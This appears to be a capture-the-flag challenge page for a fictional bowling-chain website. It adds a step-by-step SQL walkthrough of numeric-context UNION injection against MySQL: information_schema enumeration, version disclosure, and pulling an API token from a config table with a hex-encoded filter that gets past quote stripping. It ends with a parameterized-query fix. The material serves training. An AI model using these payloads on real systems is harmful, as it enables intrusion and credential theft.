LaneFive
A regional bowling chain's lane-availability check was wired up in 2019 by a contractor who'd never worked outside restaurant POS sites. The same database holds more than lane rows.
The Scenario
Hometown Bowl's website was rebuilt in 2019 on a basic Node + MySQL stack by a contractor who specialized in restaurant POS sites — a portfolio shop, a one-week turnaround, no security review. The lane-availability check was a one-off endpoint bolted onto the homepage: a lane number in, a row out, render it. The integration config for the rest of the business sits in the same database because the contractor saw no reason to set up a second one for a four-alley chain.
Challenge Intel
Synopsis
Hometown Bowl's lane availability check accepts a lane number in a query string and splices it unquoted into SQL. Use a UNION SELECT against MySQL's information_schema to find the internal key/value config table, then pull the integration API token out of it.
What It Is
Hometown Bowl runs a small regional chain of bowling alleys with online lane reservations. The check-availability endpoint at /lane-status takes a lane number from the URL, looks up that row in the lanes table, and renders four columns: name, capacity, bumpers, hourly rate. The number is spliced straight into the SELECT without binding, the usual "it's just a number, no quotes needed" mistake: because the value sits in a numeric comparison rather than inside a string literal, a payload needs no quote to break out and can begin directly with a space and a SQL keyword. Any UNION you append has to produce exactly four columns, or MySQL rejects the statement and nothing renders. The internal key/value config table lives in the same database, and the integration API token is one of its rows.
Who It's For
Players comfortable with quote-breaking SQLi who want to practice numeric-context injection and MySQL-flavored UNION extraction.
Skills You'll Practice
- Numeric-context SQLi (no quotes to break)
- MySQL UNION SELECT syntax (no FROM-dual workaround needed)
- Database version disclosure via @@version
- information_schema.tables enumeration
- Extracting a specific row from a key/value config table that no page on the site searches or displays (you locate it through information_schema, not through any application feature)
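The statements below are an added example, not the challenge's source or an official solution: they show the query the page says the endpoint runs, then each payload a player would put in the lane parameter, written out as the complete statement the server ends up executing. Only the `lanes` table, the four rendered fields and the MySQL backend come from the page. The column names (`id`, `hourly_rate`), the config table name `app_config`, its columns `k` and `v`, and the key pattern `%token%` are assumptions for the illustration; replace them with whatever the enumeration steps actually return.

```sql
-- Added example (not the challenge's own code). Assumed names: lanes.id,
-- lanes.hourly_rate, and the config table app_config(k, v).

-- 1. What the endpoint runs for /lane-status?lane=3. The parameter is
--    spliced in unquoted, so a payload never needs a closing quote.
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = 3;

-- 2. Confirm the injection with a boolean pair: the first renders lane 3,
--    the second renders nothing. Payloads: "3 AND 1=1" / "3 AND 1=2".
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = 3 AND 1=1;
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = 3 AND 1=2;

-- 3. Column count. The page gives it (four); in general probe with ORDER BY
--    until the error: ORDER BY 4 works, ORDER BY 5 raises "Unknown column".
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = 3 ORDER BY 4;

-- 4. UNION with an id that matches no lane so only the injected row renders.
--    MySQL allows SELECT with no FROM clause, hence no "FROM dual" needed.
--    Payload: "-1 UNION SELECT @@version, 2, 3, 4"
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = -1
UNION SELECT @@version, 2, 3, 4;

-- 5. Enumerate the tables of the current database. GROUP_CONCAT folds them
--    into one cell so a single-row render still shows every name.
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = -1
UNION SELECT GROUP_CONCAT(table_name), 2, 3, 4
  FROM information_schema.tables
 WHERE table_schema = DATABASE();

-- 6. Columns of the candidate key/value table (name assumed; use what step 5
--    returned).
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = -1
UNION SELECT GROUP_CONCAT(column_name), 2, 3, 4
  FROM information_schema.columns
 WHERE table_schema = DATABASE() AND table_name = 'app_config';

-- 7. Pull the token row. Column names and key pattern are assumptions.
--    If the app strips quotes, MySQL accepts the same pattern as a hex
--    literal: 0x25746f6b656e25 is '%token%'.
SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = -1
UNION SELECT GROUP_CONCAT(CONCAT(k, '=', v) SEPARATOR ' | '), 2, 3, 4
  FROM app_config
 WHERE k LIKE 0x25746f6b656e25;

-- 8. The fix, at the database layer: bind the lane number instead of
--    splicing it. The same thing is done in the application by passing the
--    value as a query parameter rather than concatenating it.
PREPARE lane_status FROM
  'SELECT name, capacity, bumpers, hourly_rate FROM lanes WHERE id = ?';
SET @lane = 3;
EXECUTE lane_status USING @lane;
DEALLOCATE PREPARE lane_status;
```

Two things to watch when running this against the real target. First, the app renders a lane row, probably only the first one, so the `id = -1` (or any value with no matching lane) is what makes the injected row the one you see; with a valid id the real lane may come first and the UNION row never appears. Second, MySQL coerces UNION result columns to a common type, so the string payload belongs in the position the app renders as text (name here); stuffing a long string into the capacity slot may render truncated or as 0 depending on how the template formats it.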
What You'll Gain
- Reflex for numeric-context injection points
- Comfort using MySQL information_schema for table enumeration